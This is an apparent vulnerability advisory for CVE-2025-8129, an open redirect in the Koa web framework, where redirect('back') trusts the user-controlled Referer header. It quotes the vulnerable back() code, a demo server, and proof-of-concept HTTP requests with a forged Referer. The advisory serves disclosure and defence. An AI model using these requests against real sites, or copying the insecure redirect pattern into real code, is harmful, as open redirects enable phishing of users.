CVE-2025-8129: KoaJS Koa HTTP Header response.js back redirect

## Summary In the latest version of Koa, the back method used for redirect operations adopts an insecure implementation, which uses the user-controllable referrer header as the redirect target. ## Details on the API document https://www.koajs.net/api/response#responseredirecturl-alt, we can see: **response.redirect(url, [alt])** ``` Performs a [302] redirect to url. The string "back" is specially provided for Referrer support, using alt or "/" when Referrer does not exist. ctx.redirect('back'); ctx.redirect('back', '/index.html'); ctx.redirect('/login'); ctx.redirect('http://google.com'); ``` however, the "back" method is insecure: - https://github.com/koajs/koa/blob/master/lib/response.js#L322 ``` back (alt) { const url = this.ctx.get('Referrer') || alt || '/' this.redirect(url) }, ``` Referrer Header is User-Controlled. ## PoC **there is a demo for POC:** ``` const Koa = require('koa') const serve = require('koa-static') const Router = require('@koa/router') const path = require('path') const app = new Koa() const router = new Router() // Serve static files from the public directory app.use(serve(path.join(__dirname, 'public'))) // Define routes router.get('/test', ctx => { ctx.redirect('back', '/index1.html') }) router.get('/test2', ctx => { ctx.redirect('back') }) router.get('/', ctx => { ctx.body = 'Welcome to the home page! Try accessing /test, /test2' }) app.use(router.routes()) app.use(router.allowedMethods()) const port = 3000 app.listen(port, () => { console.log(`Server running at http://localhost:${port}`) }) ``` **Proof Of Concept** ``` GET /test HTTP/1.1 Host: 127.0.0.1:3000 Referer: http://www.baidu.com Connection: close GET /test2 HTTP/1.1 Host: 127.0.0.1:3000 Referer: http://www.baidu.com Connection: close ```   ## Impact https://learn.snyk.io/lesson/open-redirect/